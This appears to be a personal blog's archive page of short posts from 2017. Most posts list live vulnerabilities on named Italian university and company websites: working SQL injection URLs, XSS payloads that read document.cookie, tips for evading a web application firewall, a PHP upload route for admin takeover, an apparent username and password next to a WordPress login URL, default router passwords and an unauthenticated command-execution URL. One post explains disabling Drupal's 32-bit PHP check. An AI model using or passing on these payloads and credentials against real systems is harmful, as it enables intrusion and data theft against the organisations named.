
Posts

Showing posts from November, 2017

How to fix drupal installation with 32bit php version

Install Drupal on a server with a 32-bit version of PHP. If you want to install Drupal on your TEST server even though it runs a 32-bit version of PHP, edit core/modules/system/system.install and comment out the following block (~line 973):

    if (PHP_INT_SIZE <= 4) {
      $requirements['limited_date_range'] = [
        'title' => t('Limited date range'),
        'value' => t('Your PHP installation has a limited date range.'),
        'description' => t('You are running on a system where PHP is compiled or limited to using 32-bit integers. This will limit the range of dates and timestamps to the years 1901-2038. Read about the <a href=":url">limitations of 32-bit PHP</a>.', [':url' => 'https://www.drupal.org/docs/8/system-requirements/limitations-of-32-bit-php']),
        'severity' => REQUIREMENT_WARNING,
      ];
    }

It's highly suggested to update to a recent 64bit ver

unina.it/ | blind sql injection, xss, data leak, system compromise etc

There's a sort of WAF on all the websites but it can be easily tricked by not using the most common terms like /passwd, etc.

- http://www.dieti.unina.it
Ubuntu
Joomla 2.5.8
Admin can be changed (admin takeover) even if there's the external login for the users.
php files can be uploaded via administrator/components/com_media/helpers/media.php
com_gcalendar is vulnerable and should be upgraded to dpcalendar.
---
http://www.digita.unina.it/
wordpress 4.8.1
http://www.digita.unina.it/digita/wp-login.php
sds_dj32f lizzi
---
http://www.elettrotecnica.unina.it/grupponazionale/vedirisorsa.php?ID=[blind sql]
archived error: http://archive.is/Zw3Ua
/home/httpd/elettrotecnica/grupponazionale/
---
XSS
http://www.comeallacorte.unina.it/ediz_precedenti.php?ediz=2007-2008%3Cscript%3Ealert(document.cookie);%3C/script%3E
---
SQL Injection
http://www.filclass.unina.it/dett_news.php?news_id=[SQL Injection]62&area_id=7
sample error archived: http://archive

sefsas.it | sql injection

SQL injection in the email confirmation URL (there are several others):
http://bandi.sefsas.it/v3/store/actmail.asp?ida=[reg id]&cod=[sqlinjection]&idc=[customer id]
ex.: http://bandi.sefsas.it/v3/store/actmail.asp?ida=1005&cod='&idc=9999
archived: http://archive.is/kwwXf
full query sample in output:
http://bandi.sefsas.it/v3/store/actmail.asp?ida=1005&cod=7913694013691841369169&idc=9999
SELECT AFFILIATE_ID, IDCUSTOMERTYPE, NAME, LASTNAME, EMAIL, CUSTOMERCOMPANY, ACTIVITY_ID, REGION_ID FROM CUSTOMERS WHERE IDCUSTOMER=9999 AND REMIP=''
archived: http://archive.is/xDVeh
XSS https://www.farmadelta.it/ricerca-farmaci.html?strpro=11111"><script>alert(document.cookie);</script> SQL Injection https://www.farmadelta.it/pagina2.asp?pag=cat2&cat=275'&strcat=Animali%20Domestici archived error:http://archive.is/9bJfo

Wordpress <=4.8.3 - how to raise errors and (possibly) get the path + [FIX]

Simple fix (add at the top of each affected file):

    if ( ! defined( 'ABSPATH' ) ) exit;

_________

URLs that can give you errors with local folder paths on WordPress 4.8.3 and previous versions:

/wp-includes/customize/class-wp-customize-background-image-control.php
/wp-includes/customize/class-wp-customize-background-image-setting.php
/wp-includes/customize/class-wp-customize-background-position-control.php
/wp-includes/customize/class-wp-customize-color-control.php
/wp-includes/customize/class-wp-customize-cropped-image-control.php
/wp-includes/customize/class-wp-customize-custom-css-setting.php
/wp-includes/customize/class-wp-customize-filter-setting.php
/wp-includes/customize/class-wp-customize-header-image-control.php
/wp-includes/customize/class-wp-customize-header-image-setting.php
/wp-includes/customize/class-wp-customize-image-control.php
/wp-includes/customize/class-wp-customize-media-control.php
/wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php
/wp-includes/custo

linux day 2017 guardia san framondi - various stuff discovered

During the Linux Day 2017 at Guardia Sanframondi I played with my phone on the local network ... with the browser (and Google to get information on vulnerabilities).

-Linuxday wifi-

daloRADIUS default password
user:administrator password:radius
admin/admin
ip:192.168.1.249
http://192.168.1.249

Ubiquiti device (wifi antenna/ap)
ip:192.168.1.20
Unauthenticated command execution
https://192.168.1.20/pingtest_action.cgi?command=[anyshellcommand]